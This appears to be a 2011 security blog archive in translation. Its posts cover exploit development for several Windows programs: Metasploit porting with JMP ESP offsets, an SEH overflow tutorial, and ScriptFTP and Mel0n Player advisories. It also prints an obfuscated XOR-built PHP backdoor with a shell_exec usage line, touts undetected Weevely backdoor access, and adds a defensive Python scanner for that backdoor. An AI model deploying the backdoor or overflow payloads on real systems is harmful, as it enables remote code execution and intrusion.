2011
09.26

A while ago I posted a tutorial on basic exploit development (the direct return technique) and one on SEH-based exploit development. Now let's port that exploit to the Metasploit Framework, so that it becomes more reliable and can use the many payloads and advanced features that Metasploit provides.

We will convert the first exploit, the one for Free CD to MP3 Converter. Before that, let's collect the key points that make the exploit work, as follows:

junk = "\x41" * 4112                   # number of junk bytes sent
eip = "\x91\x3b\x43\x00"               # 0x00463b91 FFE4 JMP ESP at cdextract.exe
nops = "\x90" * 16
espdata = "\x90" * (5000 - len(junk+eip+nops))   # pad the buffer out to 5000 bytes

Back then I exploited Free CD to MP3 Converter on a Windows XP SP3 system in the NIST FDCC (Federal Desktop Core Configuration) build; this time I am doing it on a standard Windows XP SP3 system. That should not be a significant problem, because the JMP ESP address I am using this time comes from the cdextract.exe module itself.


2011
09.24

After reading and learning about non-alphanumeric code in PHP, I decided to write my own simple non-alphanumeric PHP backdoor.

<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

Well, it's quite a simple program: it is just an XOR over strings. XOR-ing "<>/" with "{" gives the string "GET" as the result.
Put the result into a one-liner that executes code, and done.

Another version, with a "<pre>" tag:

<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>
Execution:
blabla.php?_=shell_exec&__=id

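As an added defensive example (not code from the original post): a small Python scanner that statically decodes the XOR-built strings used above and flags a file when one of them resolves to a PHP superglobal name and the file also indexes a computed ${'_'.$x} variable and calls the result as a function. The sample PHP sources are constructed here from the post's own one-liner and a harmless file for contrast.

```python
import re

# Constructed samples: the post's XOR one-liner and a harmless file for contrast.
SAMPLES = {
    "backdoor.php": '<?\n$_="{"; #XOR char\n'
                    '$_=($_^"<").($_^">").($_^"/"); #XOR = GET\n?>\n'
                    '<?=${\'_\'.$_}["_"](${\'_\'.$_}["__"]);?>',
    "benign.php": '<?php\n$q = $_GET["q"] ?? "";\necho htmlspecialchars($q);\n?>',
}

SUPERGLOBALS = {"GET", "POST", "REQUEST", "COOKIE", "SERVER", "FILES", "ENV"}

# A one-character string literal assigned to a variable, e.g. $_="{";
KEY_RE = re.compile(r'\$(\w+)\s*=\s*"(.)"\s*;')
# One term of an XOR concatenation chain, e.g. ($_^"<")
TERM_RE = re.compile(r'\(\$(\w+)\^"(.)"\)')
# A variable-variable built from "_" plus a computed suffix, e.g. ${'_'.$_}
VARVAR_RE = re.compile(r"""\$\{\s*['"]_['"]\s*\.\s*\$\w+\s*\}""")
# An array element invoked directly as a function, e.g. ["_"](...)
DYNCALL_RE = re.compile(r"\]\s*\(")


def decode_xor_strings(src):
    """Return (decoded_text, key_variable) for each XOR chain keyed by a known literal."""
    keys = {}
    for name, ch in KEY_RE.findall(src):
        keys.setdefault(name, ch)  # the first single-char literal is the XOR key
    results = []
    for stmt in src.split(";"):
        terms = TERM_RE.findall(stmt)
        if len(terms) < 2 or any(name not in keys for name, _ in terms):
            continue
        decoded = "".join(chr(ord(keys[name]) ^ ord(c)) for name, c in terms)
        results.append((decoded, terms[0][0]))
    return results


def scan_php(src):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    for text, var in decode_xor_strings(src):
        if text in SUPERGLOBALS:
            findings.append(f"XOR chain on ${var} decodes to superglobal name {text}")
    if VARVAR_RE.search(src) and DYNCALL_RE.search(src):
        findings.append("computed ${'_'.$x} variable is indexed and called as a function")
    return findings


if __name__ == "__main__":
    for path, src in SAMPLES.items():
        print(path, scan_php(src) or "clean")
```

The scanner only understands the single-key, single-character XOR pattern shown in the post; variants that split the key across several variables or use other operators would need additional rules.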
2011
09.20

The ScriptFTP client is vulnerable to a remote buffer overflow. The condition is triggered while processing a LIST FTP command of excessive length.

The vulnerability is confirmed in version 3.3. Other versions may also be affected.

Software Description

ScriptFTP is an FTP client designed to automate file transfers. It follows the commands written in a text file (also called a script file) and performs the uploads or downloads automatically. Writing the script file is very easy; take a look at the script samples section.

Crash/Exploit Information

ScriptFTP follows the commands written in a text file (also called a script file). Specifically, running ScriptFTP with a script file that contains a GETLIST or GETFILE command of 3000 or more bytes of data may trigger an exception within the client, causing it to crash and leading to a stack overflow.

Proof of Concept

See the POC here and the script to generate the ScriptFTP script file here. Or, if you are too lazy to generate the script, I have already prepared it for you; just change the IP address.

Fix and Update

The vendor was contacted and responded immediately after our first contact. They are planning a major rewrite, but so far no further information has been received from them. Do not connect to untrusted FTP servers. A fix or update is not available yet; we will update this post if the vendor fixes the bug.

Vendor Contact Log:
01/21/2011: Bug found
01/22/2011: Vendor contacted
01/24/2011: Vendor replied
03/07/2011: Update status to vendor
04/06/2011: Vendor received POC
05/17/2011: No further info, 1st reminder sent.
09/11/2011: No further info, 2nd reminder sent.
09/20/2011: No response, advisory released.

POC Video

2011
09.14

This time I will try another stack overflow technique: the SEH-based stack overflow. What is SEH? Please read the following literature:

  1. Structured Exception Handling
  2. Win32 Exception handling for assembler programmers

Nothing is more fun than learning by doing :)
We will try an SEH-based stack overflow on a program that sickness once posted about, Elecard AVC_HD/MPEG Player. Elecard AVC_HD/MPEG Player version 5.7 suffers from a buffer overflow when it tries to load an .m3u file that has been padded with a number of characters. This experiment will be carried out on Windows XP SP3, using the same program as in the exploit sickness used, so please download the program first:

Download Elecard AVC_HD/MPEG Player (via ExploitDB)

I assume you have already read my previous post, Exploit Development: Basic Stack-based Overflow, so you know what needs to be prepared. In theory, an SEH-based overflow requires a special trick because we are dealing with exception handling. When the program crashes (because of the buffer overflow), EIP is not immediately overwritten by the buffer/junk we send; instead we are taken to the exception handler. We only need to make sure that the SE Handler address is also overwritten by the buffer we send, so that when the exception handler is invoked it brings us to EIP. It sounds very complicated, but don't worry, everything will look much easier once we try it ourselves :)


2011
09.12

Ever thought about accessing your backdoor undetected? Well, maybe not all web administrators examine their PHP files :)

Weevely is the answer. Just follow these steps (I was doing this on BackTrack 5; take a look at the orange characters ;) ):


2011
09.10

Software Description
Mel0n Player is popular software in Indonesia for playing songs provided by the Melon portal (http://www.melon.co.id). This software can play many music file types, such as mp3, wav, wma, mp4, and others. The player can also play files on your local computer or stream online from the Melon portal. Songs can also be downloaded to your local computer.

Vulnerable Information
The main program (IDMelonPlayer.exe) suffers from a buffer overflow when opening the p_about.ini file (note: p_about.ini is a configuration file that is part of the skin template; it provides the program information that can be accessed via Menu → Information). Adding extra bytes to parts of the file (the Text section) gives an attacker the possibility of running arbitrary code on the system where Melon Player is installed.

This is just the POC; it will only crash the program, and it's in Unicode format ;)
